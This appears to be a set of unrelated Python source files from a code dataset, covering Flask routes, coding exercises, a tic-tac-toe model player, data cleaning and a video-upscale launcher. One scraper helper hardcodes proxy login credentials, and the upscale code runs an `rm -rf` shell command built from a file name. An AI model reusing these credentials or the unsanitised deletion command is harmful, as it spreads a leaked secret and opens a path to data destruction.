Style_WorkCenter.Id_Style_WorkCenter = Style_GeneralInfo.Id_Style_WorkCenter\n \"\"\"\n df_style = pd.json_normalize(loop2.run_until_complete(conn.runServer(textSQL)))\n df_style['StyleName'] = df_style['StyleName'].astype(str)\n df['StyleNumber'] = df['StyleNumber'].astype(str)\n merge1 = df.merge(df_style, how='left', left_on=['StyleNumber'], right_on=['StyleName']) \n merge1.to_excel(v_path + \"\\\\NIKE-Model.xlsx\", sheet_name='Sheet1', index=False)\n result = merge1.to_json(orient=\"records\")\n return result\n except Exception as ex:\n print(ex)\n return jsonify({'message': str(ex)}), 500","repo_name":"MiguelCarcamo/MasterApp","sub_path":"back-app/routes/File_ActionForecast.py","file_name":"File_ActionForecast.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72485523687","text":"import math\n\n# function to find the longest word and also printing the reverse of each word in the string\ndef stringoperations(stringlist,stringinput):\n\n # operating the string to print the longest word\n\n # initializing an object to find the longest word\n reqword = ''\n\n # searching for the longest word in whole list\n for word in stringlist:\n\n # Comparing the lengths of every word among the set to find the longest one\n if len(word) > len(reqword):\n reqword = word\n print ('The longest word in the string is:', reqword)\n\n # operating on the string to print the reverse of the words in the string\n\n # reversing the words and storing them into a list at a time\n reversewords = [rev[::-1] for rev in stringlist]\n\n # Joining the reversed words into a sentence\n revsentence = \" \".join(reversewords)\n\n # Printing the new sentence that is reversed\n print('The reversed sentence is:', revsentence)\n\n\n # Finding the middle words in the string\n\n # Loading the length of the list into a variable\n length = len(stringlist)\n\n # If the number of words in the list are even, then we will have two middle words.\n # If the number of words in the list are odd, then we will have one middle word.\n\n # Checking if the string length is even or odd and then printing the middle words in the sentence.\n if (length%2 == 0):\n mid = int(length/2)\n # Printing the middle words if the number of words are even\n print(' The middle words are:', stringinput.split(\" \")[mid], stringinput.split(\" \")[mid-1])\n\n else:\n mid = int(length/2)\n # Printing the middle word if the number of words are odd\n print('The middle word is:', stringinput.split(\" \")[mid])\n\n\n# entering the string as input to perform verious operations\nstringinput = input(\"Enter the string on which you want to perform string operations:\")\n\n# Splitting the sentence into individual words\nstringlist = stringinput.split()\n\n# Calling the function to perform various operations on the string\nstringoperations(stringlist,stringinput)\n","repo_name":"Vamsikrishnachalla/Python-DeepLearning","sub_path":"Python LAB 1/source/stringoperations/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27965849326","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/22970\n# l = one()\n# n_list = list(wow())\n# max_max = 0\n# for start in range(l):\n# le = 1\n# state = \"plus\"\n# number = \"none\"\n# for a in range(start,l):\n# if number == \"none\":\n# number = n_list[a]\n# else:\n# if state == \"plus\":\n# if number < n_list[a]:\n# number=n_list[a]\n# le+=1\n# elif number == n_list[a]:\n# break\n# else:\n# number = n_list[a]\n# le+=1\n# state = \"minus\"\n# else:\n# if number < n_list[a]:\n# break\n# elif number == n_list[a]:\n# break\n# else:\n# le+=1\n# number=n_list[a]\n# max_max = max(max_max,le)\n# print(max_max)\n\n#https://www.acmicpc.net/problem/4881\n# def go(num,n_dict):\n# if num not in n_dict:\n# n_dict[num]=1\n# else:\n# return\n# num = list(map(int,list(str(num))))\n# cnt = 0\n# for i in num:\n# cnt+=i**2\n# num = cnt\n# go(num,n_dict)\n \n# while True:\n# a,b = wow()\n# if a==b==0:\n# break\n# a_dict = {}\n# b_dict = {}\n# go(a,a_dict)\n# go(b,b_dict)\n# # print(a_dict)\n# # print(b_dict)\n# a_list = list(a_dict.keys())\n# b_list = list(b_dict.keys())\n# check = set(a_list)&set(b_list)\n# min_min = 100001\n# if len(check) != 0:\n# for i in check:\n# a_index = a_list.index(i)+1\n# b_index = b_list.index(i)+1\n# min_min=min(min_min,a_index+b_index)\n# print(a,b,min_min)\n# else:\n# print(a,b,0)\n\n#https://www.acmicpc.net/problem/1021\n# n,l = wow()\n# n_list = [i for i in range(1,n+1)]\n# a_list = list(wow())\n# cnt = 0\n# for i in a_list:\n# p_index = n_list.index(i)\n# m_index=len(n_list)-p_index\n# # print(n_list,p_index,i)\n# cnt+=min(p_index,m_index)\n# n_list = n_list[p_index:]+n_list[:p_index]\n# del n_list[n_list.index(i)]\n# # print(n_list,cnt)\n# print(cnt)\n\n#https://www.acmicpc.net/problem/1740\n# num = one()\n# index = 0\n# cnt = 0\n# for i in bin(num)[2:][::-1]:\n# cnt+=int(i)*(3**index)\n# index+=1\n# print(cnt)\n\n#https://www.acmicpc.net/problem/16439\n# n,l = wow()\n# n_list = [list(wow()) for _ in range(n)]\n# max_max = 0\n# n_dict = {}\n# for y in range(n):\n# for x in range(l):\n# if x not in n_dict:\n# n_dict[x]=[]\n# n_dict[x]+=[n_list[y][x]]\n\n# for a in range(l-2):\n# for b in range(a+1,l-1):\n# for c in range(b+1,l):\n# x=n_dict[a]\n# y=n_dict[b]\n# z=n_dict[c]\n# cnt = 0\n# for index in range(n):\n# count = max(x[index],y[index],z[index])\n# cnt+=count\n# max_max=max(cnt,max_max)\n# print(max_max)\n\n#https://www.acmicpc.net/problem/21920\n# import math\n# l = one()\n# n_list = list(wow())\n# num = one()\n# cnt = 0\n# count = 0\n# for i in n_list:\n# if math.gcd(i,num) == 1:\n# count+=1\n# cnt+=i\n# print(cnt/count)\n\n#https://www.acmicpc.net/problem/13414\n# n_dict = {}\n# limit,r = wow()\n# for _ in range(r):\n# a = inputing()\n# if len(a) == 8:\n# if a not in n_dict:\n# n_dict[a]=1\n# else:\n# del n_dict[a]\n# n_dict[a]=1\n# # print(n_dict)\n# print(*list(n_dict.keys())[:limit],sep=\"\\n\")\n \nnum = one()\ncnt = [0]\nn_dict = {}\ndef go(number):\n cnt[0]+=1\n cnt[0]%=1000000007\n if number in n_dict:\n return n_dict[number]\n if number < 2:\n print(number,n_dict,cnt)\n n_dict[number]=cnt[0]\n return\n else:\n print(\"wow\",number)\n return go(number-2)+go(number-1)\ngo(num)\nprint(n_dict[num-1],n_dict[num-2])\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/11월/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29857301197","text":"# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport tensorflow as tf\nimport tictactoe\n\nwith tf.Graph().as_default() as g:\n sess = tf.Session()\n meta_graph = tf.saved_model.loader.load(\n sess=sess,\n tags=[tf.saved_model.tag_constants.SERVING],\n export_dir=\"model\"\n )\n model_signature = meta_graph.signature_def[tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY]\n input_signature = model_signature.inputs\n output_signature = model_signature.outputs\n # Get names of input and output tensors\n input_tensor_name = input_signature[\"x\"].name\n output_tensor_name = output_signature[\"y\"].name\n # Get input and output tensors\n x_ph = sess.graph.get_tensor_by_name(input_tensor_name)\n y = sess.graph.get_tensor_by_name(output_tensor_name)\n\nenv = tictactoe.TicTacToeEnv()\nobservation = env.reset()\ndone = False\ninfo = None\n\nrule = \"\"\"\nInput your move!\n\n[0] top-left-square\n[1] top-middle-square\n[2] top-right-square\n[3] middle-left-square\n[4] middle-middle-square\n[5] middle-right-square\n[6] bottom-left-square\n[7] bottom-middle-square\n[8] bottom-right-square\n\"\"\"\n\nprint(rule)\n\nfor _ in range(9):\n env.render()\n if done:\n if info[\"x\"]:\n print(\"x win!\")\n elif info[\"o\"]:\n print(\"o win!\")\n else:\n print(\"Draw!\")\n break\n # Compute scores\n prob_x_win = -np.ones(9)\n prob_o_win = np.ones(9)\n # prob_draw = np.zeros(9)\n for i in range(9):\n if env.board[i] == 0:\n board_copy = np.array([env.board])\n board_copy[0][i] = 1\n prob = sess.run(y, feed_dict={x_ph: board_copy})\n # print i, prob\n prob_x_win[i] = prob[0][0]\n prob_o_win[i] = prob[0][1]\n # prob_draw = prob[0][2]\n # Decide CPU's move\n if max(prob_x_win) >= 0.05:\n cpu_move = prob_x_win.argmax()\n else:\n cpu_move = prob_o_win.argmin()\n _, _, done, info = env.step(cpu_move)\n env.render()\n if done:\n if info[\"x\"]:\n print(\"x win!\")\n elif info[\"o\"]:\n print(\"o win!\")\n else:\n print(\"Draw!\")\n break\n while True:\n sys.stdout.write(\"Input your move: \")\n player_move = input()\n _, _, done, info = env.step(player_move)\n if info[\"valid\"]:\n break\n","repo_name":"hephaex/deeplearning-note","sub_path":"3_ETRI-lecture/tictactoe/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"24313203234","text":"from compareV2 import Compare\nfrom many_extractorV2 import FeatureExtractor as fe\nimport pickle as pkl\n\n#create compare object\ncompOBJ = Compare() \n#import feature from compare objects\n#you can find all of vector data that you need \nfeatures = compOBJ.data\n# import single image by user : you can use another input methods\n#single_image_path = '/home/mahdi/Pictures/nike.png'\nsingle_image_path = input('image path : ')\n#product_id = 11111\nproduct_id = input('input product id : ')\n#create object of feature extractor on many_extractor file to make vector of single image.\nfe_obj = fe()\n#####################################################\nfeature_table = fe_obj.feature_table(single_image_path,product_id,'shape','texture','color','SIFT','SURF','KAZE')\nsimilarity_results = compOBJ.compare(feature_table,'shape','texture','color','SIFT','SURF','KAZE')\n\nwith open('compare_results.pkl','wb') as f:\n pkl.dump(similarity_results,f)\n\n\n\n","repo_name":"mahdisharifloo/autoEncoding_and_clustering","sub_path":"evoke_similarity/r_and_d/customizable/run_compareV2.py","file_name":"run_compareV2.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9272931726","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Created by Charles on 2018/6/20\r\n# Function: A simple example for using init_log_config()\r\n\r\nfrom log_config.log_config import init_log_config\r\nimport logging\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\ndef produce_log():\r\n\r\n logger.debug(\"this is a message of debug level.\")\r\n logger.info(\"this is a message of info level.\")\r\n logger.error(\"this is a message of error level\")\r\n\r\n\r\ndef test():\r\n try:\r\n # raise()\r\n a = 5 / 0\r\n except Exception as e:\r\n logger.exception(\"this is a message of error level\\n e={}\".format(e))\r\n\r\n\r\nif __name__ == '__main__':\r\n init_log_config()\r\n produce_log()\r\n test()\r\n","repo_name":"AIRob/Huobi","sub_path":"test_code/log_test.py","file_name":"log_test.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28357940926","text":"import numpy as np\nimport itertools\nimport random\nimport math\n\nfrom tasks.tree_dataset import TreeDataset\nimport common\n\n\nclass DictionaryLookupDataset(TreeDataset):\n def __init__(self, depth):\n super(DictionaryLookupDataset, self).__init__(depth)\n\n def get_combinations(self):\n # returns: an iterable of [key, permutation(leaves)]\n # number of combinations: (num_leaves!)*num_choices\n num_leaves = len(self.leaf_indices)\n num_permutations = 1000\n max_examples = 32000\n\n if self.depth > 3:\n per_depth_num_permutations = min(num_permutations, math.factorial(num_leaves), max_examples // num_leaves)\n permutations = [np.random.permutation(range(1, num_leaves + 1)) for _ in\n range(per_depth_num_permutations)]\n else:\n permutations = random.sample(list(itertools.permutations(range(1, num_leaves + 1))),\n min(num_permutations, math.factorial(num_leaves)))\n\n return itertools.chain.from_iterable(\n\n zip(range(1, num_leaves + 1), itertools.repeat(perm))\n for perm in permutations)\n\n def get_nodes_features(self, combination):\n # combination: a list of indices\n # Each leaf contains a one-hot encoding of a key, and a one-hot encoding of the value\n # Every other node is empty, for now\n selected_key, values = combination\n\n # The root is [one-hot selected key] + [0 ... 0]\n nodes = [ (selected_key, 0) ]\n\n for i in range(1, self.num_nodes):\n if i in self.leaf_indices:\n leaf_num = self.leaf_indices.index(i)\n node = (leaf_num+1, values[leaf_num])\n else:\n node = (0, 0)\n nodes.append(node)\n return nodes\n\n def label(self, combination):\n selected_key, values = combination\n return int(values[selected_key - 1])\n\n def get_dims(self):\n # get input and output dims\n in_dim = len(self.leaf_indices)\n out_dim = len(self.leaf_indices)\n return in_dim, out_dim\n","repo_name":"tech-srl/bottleneck","sub_path":"tasks/dictionary_lookup.py","file_name":"dictionary_lookup.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"53"} +{"seq_id":"18969020480","text":"import csv\nimport pickle\nimport pprint\n\nimport numpy as np\n\nfrom p1_data_to_boolean import write_data, data_stats\n\n# Class names -> numbers\ncls_dict = {'republican': 0, 'democrat': 1}\n\n\ndef read_votedata(path):\n \"\"\"Reading data and changing 'y' to 1, 'n' to 0 and the missing values to randomly selected 1 or 0. The class names\n also have been changed to {republican, democrat} -> {0, 1} and moved to the last column\"\"\"\n with open(path, 'r') as dataset:\n csv_reader = csv.reader(dataset)\n data_set = []\n\n for row in csv_reader:\n tmp_row = []\n for value in row[1:]:\n if value == 'y':\n tmp_row.append(1)\n elif value == 'n':\n tmp_row.append(0)\n elif value == '?':\n np.random.seed(0)\n tmp_row.append(np.random.randint(2))\n\n tmp_row.append(cls_dict[row[0]])\n data_set.append(tmp_row)\n\n return np.array(data_set)\n\n\ndef main():\n vote_data = read_votedata('input_files/house-votes-84.csv')\n\n # Writing the new converted data list into a file\n write_data('input_files/boolean_files/bool_votedata.csv', vote_data)\n\n vote_cov, vote_means, vote_std = data_stats(vote_data)\n\n # dumping dataset into output to be used in the Winnow2 and Bayes programs\n vote_data_set = {\n 'vote_data': vote_data,\n }\n\n with open('vote_data_set.pkl', 'wb') as output:\n pickle.dump(vote_data_set, output)\n\n print(\"Covariance is:\")\n pprint.pprint(vote_cov)\n print('\\nMean is: ')\n pprint.pprint(vote_means)\n print('\\nSandard Deviation is: ')\n pprint.pprint(vote_std)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NazaninYari/ML_Projects","sub_path":"bayes_classifier_vs_winnow2/src/p1_votedata_cleansing.py","file_name":"p1_votedata_cleansing.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1311101939","text":"import random\nfrom bs4 import BeautifulSoup\n\nimport requests\n\n\nuser_agents = [\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0\",\n # \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\",\n # \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.1 Safari/605.1.15\"\n # \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41\",\n # \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\"\n]\n\nheaders = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Connection\": \"keep-alive\",\n \"DNT\": \"1\",\n \"Host\": \"www.amazon.com\",\n \"Sec-Fetch-Dest\": \"document\",\n \"Sec-Fetch-Mode\": \"navigate\",\n \"Sec-Fetch-Site\": \"cross-site\",\n \"TE\": \"trailers\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": random.choice(user_agents),\n}\n\nhttp_proxy = \"http://kayjitsu:auMYDwfm8Su4K0ph@proxy.packetstream.io:31112\"\nhttps_proxy = \"http://kayjitsu:auMYDwfm8Su4K0ph@proxy.packetstream.io:31112\"\n\nproxy_dict = {\n \"http\": http_proxy,\n \"https\": https_proxy,\n}\n\n\nclass RequestHandler:\n def __init__(self, url, headers=headers, proxies=proxy_dict, params=None):\n self.url = url\n self.headers = headers\n self.params = params\n self.proxies = proxies\n\n def send_get_request(self):\n try:\n response = requests.get(self.url, headers=self.headers, params=self.params, proxies=self.proxies)\n return response\n except:\n return None\n\n\n def process_response(self, response):\n if response:\n if response.status_code == 200:\n return response\n else:\n return None\n\n def get_soup(self, response):\n soup = BeautifulSoup(response.content, \"html.parser\")\n soup.prettify()\n return soup\n\n\nclass IngestHandler:\n def __init__(self, url_list: list):\n self.asins_list = url_list\n\n def ingest_asins(self):\n pass","repo_name":"chrismartinio/reviewtrail","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4954984008","text":"from time import sleep\nfrom shelljob import proc\nfrom pathlib import Path\nfrom flask import render_template\nfrom flask import jsonify\nfrom flask import request\nfrom flask import Response\nfrom flask import flash, url_for, redirect\nfrom werkzeug.utils import secure_filename\nfrom app import app\nfrom .cfg import hubInterface\nfrom .cfg import usbHubInterface\nimport random\nimport string\nimport sys\nimport os\n\n\n\n\ndef index_contents_update():\n not_in_use_text = \"Not In Use\"\n #show slots with < 54 mA as no board present to filter out the noise of unpopualted slots - 1bit = 13.3mA\n # so 4 bits is 53.2m\n if hubInterface.get_port_1_current() < 54:\n slot1_current = not_in_use_text\n slot1_power = not_in_use_text\n else:\n slot1_current = '{:02.1f}mA'.format(hubInterface.get_port_1_current())\n slot1_power = '{:02.2f}W'.format(hubInterface.get_port_1_power())\n \n if hubInterface.get_port_2_current() < 54:\n slot2_current = not_in_use_text\n slot2_power = not_in_use_text\n else:\n slot2_current = '{:02.1f}mA'.format(hubInterface.get_port_2_current())\n slot2_power = '{:02.2f}W'.format(hubInterface.get_port_2_power())\n \n if hubInterface.get_port_3_current() < 54:\n slot3_current = not_in_use_text\n slot3_power = not_in_use_text\n else:\n slot3_current = '{:02.1f}mA'.format(hubInterface.get_port_3_current())\n slot3_power = '{:02.2f}W'.format(hubInterface.get_port_3_power())\n \n if hubInterface.get_port_4_current() < 54:\n slot4_current = not_in_use_text\n slot4_power = not_in_use_text\n else:\n slot4_current = '{:02.1f}mA'.format(hubInterface.get_port_4_current())\n slot4_power = '{:02.2f}W'.format(hubInterface.get_port_4_power())\n\n templateData = {\n 'slot_1_current' : slot1_current,\n 'slot_2_current' : slot2_current,\n 'slot_3_current' : slot3_current,\n 'slot_4_current' : slot4_current,\n 'slot_1_power' : slot1_power,\n 'slot_2_power' : slot2_power,\n 'slot_3_power' : slot3_power,\n 'slot_4_power' : slot4_power,\n 'mains_current' : '{:02.1f}mA'.format(hubInterface.get_mains_current()),\n 'mains_power' : '{:02.2f}W'.format(hubInterface.get_mains_power()),\n 'board_voltage' : '{:02.2f}V'.format(hubInterface.get_board_voltage())\n }\n return templateData\n\n@app.route('/')\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', **index_contents_update())\n\n@app.route('/current_miner_info.json')\ndef current_hub_info():\n return jsonify(index_contents_update())\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in {'hex'}\n\n@app.route('/firmwareupdate', methods=['GET', 'POST'])\ndef firmwareupdate():\n if request.method == 'POST':\n # check if the post request has the file part, if not then its come from the complete button\n if 'file' not in request.files:\n #restart hub after update\n hubInterface.resume_after_firmware_update()\n return render_template('firmwareupdate.html')\n #got a file name, so save the file local for flashing \n file = request.files['file']\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n #mark hub for firmware update\n hubInterface.clear_prog_loaded_bootloader_flag()\n return render_template('firmwareupdate-progress.html', **{'filename':filename})\n else:\n return render_template('firmwareupdate.html')\n\n@app.route('/resetbutton.json', methods=['GET', 'POST'])\ndef resetbutton():\n if request.method == 'POST':\n print(\"Performing hard reset for slot \" + request.json['slot'])\n #power cycle the requested slot \n usbHubInterface.change_power_state(int(request.json['slot']))\n sleep(0.5)\n usbHubInterface.change_power_state(int(request.json['slot']))\n return \"nothing\"\n\n@app.route('/firmware_update_stream')\ndef firmware_update_stream():\n\n filename = os.path.join(app.config['UPLOAD_FOLDER'], request.args.get(\"filename\"))\n #give a short period to allow the file to be updloaded\n escape_count = 0\n while not Path(filename).is_file():\n if escape_count > 5:\n break\n escape_count += 1\n sleep(0.5)\n \n g = proc.Group()\n p = g.run([\"python3\", os.path.join(app.config['UPLOAD_FOLDER'],\"update_firmware.py\"), \"-H \" + filename])\n\n def read_process():\n while g.is_pending():\n lines = g.readlines()\n for proc, line in lines:\n yield \"data:\" + str(line, 'utf-8') + \"\\n\\n\"\n \n yield \"data: finished\\n\\n\"\n \n read_proc_op = read_process()\n return Response(read_proc_op,mimetype='text/event-stream')\n\n","repo_name":"neilbirtles/SBC-Cluster-Board","sub_path":"Frontend/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2635039203","text":"import os\nimport sys\nimport warnings\nimport pkgutil\nimport inspect\nimport py_compile\nimport pprint\n\n\nclass Bundles (object) :\n \n def __init__(self, path=None, bundelType=None) :\n \n if not path :\n warnings.warn ('class \\\"Bundles\\\" argument \\\"path\\\" None or emty') \n \n if not bundelType :\n warnings.warn ('class \\\"Bundles\\\" argument \\\"bundelType\\\" None or emty')\n \n self.bundleType = bundelType \n self.bundlePath = path \n \n\n def createBundles (self):\n \n warnings.warn ('work in progress')\n\n \n def getValidBundles (self) : \n \n bundles = collectBundles (self.bundlePath, self.bundleType) \n return bundles\n \n \n def getPythonBundles (self, exculeFolders) :\n \n bundles = collectValidBundles (self.bundlePath, exculeFolders)\n return bundles\n\n\ndef collectBundles (path, bundleType):\n \n if not path :\n warnings.warn ('Function \\\"getBundles\\\" argument \\\"path\\\" None or emty')\n \n if not os.path.isdir(path) :\n warnings.warn ('{} - No such directory'.format(path))\n \n bundleData = {} \n \n for module_loader, name, ispkg in pkgutil.iter_modules([path]) : \n loader = module_loader.find_module(name) \n \n module = loader.load_module (name)\n print (module_loader, name, module)\n \n if not hasattr(module, 'TYPE') :\n continue\n \n if module.TYPE!=bundleType and module.TYPE!='None':\n continue \n \n moduleMembers = {} \n for moduleName, value in inspect.getmembers (module) : \n moduleMembers.setdefault (moduleName, value) \n \n bundleData.setdefault (module, moduleMembers)\n \n return bundleData\n\n\ndef reorder (data, key) :\n \n result = {}\n\n ing = 0\n for eachKey, eachValue in data.items () :\n \n #=======================================================================\n # if key not in eachValue :\n # continue\n #=======================================================================\n \n if eachValue[key] : \n ing = eachValue[key]\n \n if not eachValue[key] : \n ing+=1\n \n if eachValue[key] in result :\n ing = eachValue[key] + 1 \n \n result.setdefault(ing, eachKey)\n \n return result \n\n\ndef collectValidBundles (path, exculeFolders):\n \n '''\n Description\n Type - standalone function\n To validate the python code. \n \n :param path exxample 'Z:\\packages'\n :param exculeFolders example ['resources', 'plugins', 'bin', 'icons']\n \n :return result example { 'validModules', {currentFile, 'True'},\n 'unvalidModules', {currentFile, str(reult)}} \n '''\n \n validResult = { 'validModules': {},\n 'unvalidModules': {}}\n \n for root, dirs, files in os.walk (path): \n for eachFile in files:\n currentFile = os.path.abspath(os.path.join(root, eachFile)) \n exists = True\n \n for eachExclude in exculeFolders:\n if currentFile.startswith (os.path.abspath(os.path.join(path, eachExclude))) :\n exists = False\n continue \n \n if not exists :\n continue \n if not currentFile.endswith('.py'): \n continue \n \n try : \n #module_loader = imp.load_source('', currentFile)\n py_compile.compile(currentFile) \n validResult.setdefault('validModules', {currentFile, 'True'})\n \n except Exception as compailResult: \n validResult.setdefault('unvalidModules', {currentFile, str(compailResult)})\n \n print ('validModules', currentFile, 'True')\n \n return validResult\n\n#End############################################################################","repo_name":"subing85/packages_test","sub_path":"module/collectBundels.py","file_name":"collectBundels.py","file_ext":"py","file_size_in_byte":4498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27199446702","text":"\"\"\"Command-line interface for the iTEM databases.\"\"\"\nfrom pathlib import Path\nfrom textwrap import indent\n\nimport click\n\nfrom item.historical.cli import historical\nfrom item.model.cli import model\nfrom item.remote.cli import remote\n\n\n@click.group(help=__doc__)\n@click.option(\n \"--path\",\n \"paths\",\n type=(str, click.Path()),\n multiple=True,\n metavar=\" \",\n help=\"Override data paths (multiple allowed).\",\n)\ndef main(paths):\n from item.common import init_paths\n\n paths = {k.replace(\"_\", \" \"): v for (k, v) in paths}\n\n init_paths(**paths)\n\n\n@main.command()\ndef help():\n \"\"\"Show extended help for the command-line tool.\"\"\"\n print(__doc__, end=\"\\n\\n\")\n print(\n \"\"\"This tool takes configuration options in one of two ways:\n\n1. From a file named item_config.yaml in the current directory. For\n instance, to override the path to the raw model data, put the\n following in item_config.yaml:\n\n path:\n 'model raw': ../custom/data/location\n\n2. From command-line options. For instance, give the following:\n\n $ ./run --path model_raw ../custom/data/location COMMAND\n\nUnderscores are converted to spaces automatically.\n\nIn a Python script, the following is equivalent:\n\n import item\n item.init_paths(model_raw='../custom/data/location')\n …\n\"\"\"\n )\n\n\n@main.command()\ndef debug():\n \"\"\"Show debugging information, including paths.\"\"\"\n import yaml\n\n from item.common import config, paths\n\n dump_args = dict(indent=2, default_flow_style=False)\n\n def _dump(data):\n print(indent(yaml.dump(data, **dump_args), \" \"))\n\n print(\"Configuration file: %s\" % config.get(\"_filename\", \"none\"))\n _dump(config.get(\"_from_file\", {}))\n\n print(\"Command-line overrides:\")\n _dump(config.get(\"_cli\", {}))\n\n print(\"Paths:\")\n _dump(paths)\n\n\n@main.command()\n@click.option(\"--dry-run\", \"-n\", is_flag=True, help=\"Only show what would be done.\")\n@click.argument(\"path\", type=click.Path())\ndef mkdirs(path, dry_run):\n \"\"\"Create a directory tree for the database.\"\"\"\n from item.common import make_database_dirs\n\n make_database_dirs(path, dry_run)\n\n\n@main.command()\ndef template():\n \"\"\"Generate the MIP submission template.\"\"\"\n from item.structure import make_template\n\n make_template()\n\n\n@main.command(\"update-dsd\")\ndef update_dsd():\n \"\"\"Generate the iTEM SDMX data structures.\n\n The file item/data/structure.xml is updated.\n \"\"\"\n import sdmx\n\n from item.structure import generate\n\n with open(Path(__file__).parent / \"data\" / \"structure.xml\", \"wb\") as f:\n f.write(sdmx.to_xml(generate(), pretty_print=True))\n\n\nmain.add_command(model)\nmain.add_command(historical)\nmain.add_command(remote)\n","repo_name":"transportenergy/database","sub_path":"item/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"75320706728","text":"\nimport src.return_data as return_data\nimport os\nfrom src.settings import *\nimport src.runAI.transition_detection\nfrom src.return_data import *\nfrom src.messages import *\nfrom src.discord_rpc import *\nimport os\nfrom modules.commands import *\nfrom cv2 import VideoCapture, CAP_PROP_FRAME_WIDTH, CAP_PROP_FRAME_HEIGHT, CAP_PROP_FPS, CAP_PROP_FRAME_COUNT\n\nimport src.thisdir\nthisdir = src.thisdir.thisdir()\nhomedir = os.path.expanduser(r\"~\")\nfrom PyQt5.QtCore import QThread\nimport src.workers as workers\n\n\n \ndef initializeUpscale(self,AI):#1st stage in preparing render, starts all worker threads\n try:\n if self.input_file != '':\n settings = Settings()\n os.system(f'rm -rf \"{settings.RenderDir}/{self.videoName}_temp/\"')\n self.ui.logsPreview.clear()\n \n self.render='esrgan'\n self.AI = AI\n \n self.setDisableEnable(True)\n \n if settings.DiscordRPC == 'Enabled':\n try:\n start_discordRPC(self,'Upscaling')\n except:\n print('No discord on this machine')\n \n realESRGAN_Model = self.ui.Rife_Model.currentText()\n realESRGAN_Times = self.ui.Rife_Times.currentText()[0]\n if AI == 'realesrgan-ncnn-vulkan':\n if realESRGAN_Model == 'Default':\n self.realESRGAN_Model = '-n realesrgan-x4plus -s 4'\n \n if realESRGAN_Model == 'Animation':\n self.realESRGAN_Model = f'-n realesr-animevideov3 -s {realESRGAN_Times}'\n else:\n self.realESRGAN_Model = f'-n {self.ui.Rife_Model.currentText()} -s {realESRGAN_Times}'\n \n self.ui.logsPreview.append(f'[Extracting Frames]')\n self.ui.ETAPreview.setText('ETA:')\n self.ui.processedPreview.setText('Files Processed:')\n \n self.upscaleThread = QThread()\n # Step 3: Create a worker object\n \n self.upscaleWorker = workers.upscale(self) \n \n\n \n\n # Step 4: Move worker to the thread\n self.upscaleWorker.moveToThread(self.upscaleThread)\n # Step 5: Connect signals and slots\n self.upscaleThread.started.connect(self.upscaleWorker.finishRenderSetup)\n self.upscaleWorker.finished.connect(self.upscaleThread.quit)\n self.upscaleWorker.finished.connect(self.upscaleWorker.deleteLater)\n self.upscaleThread.finished.connect(self.upscaleThread.deleteLater)\n self.upscaleWorker.log.connect(self.addLinetoLogs)\n self.upscaleWorker.removelog.connect(self.removeLastLineInLogs)\n self.upscaleWorker.finished.connect(self.endRife)\n # Step 6: Start the thread\n \n self.upscaleThread.start()\n self.runPB()\n else:\n self.showDialogBox(no_input_file)\n except Exception as e:\n log(e)\n 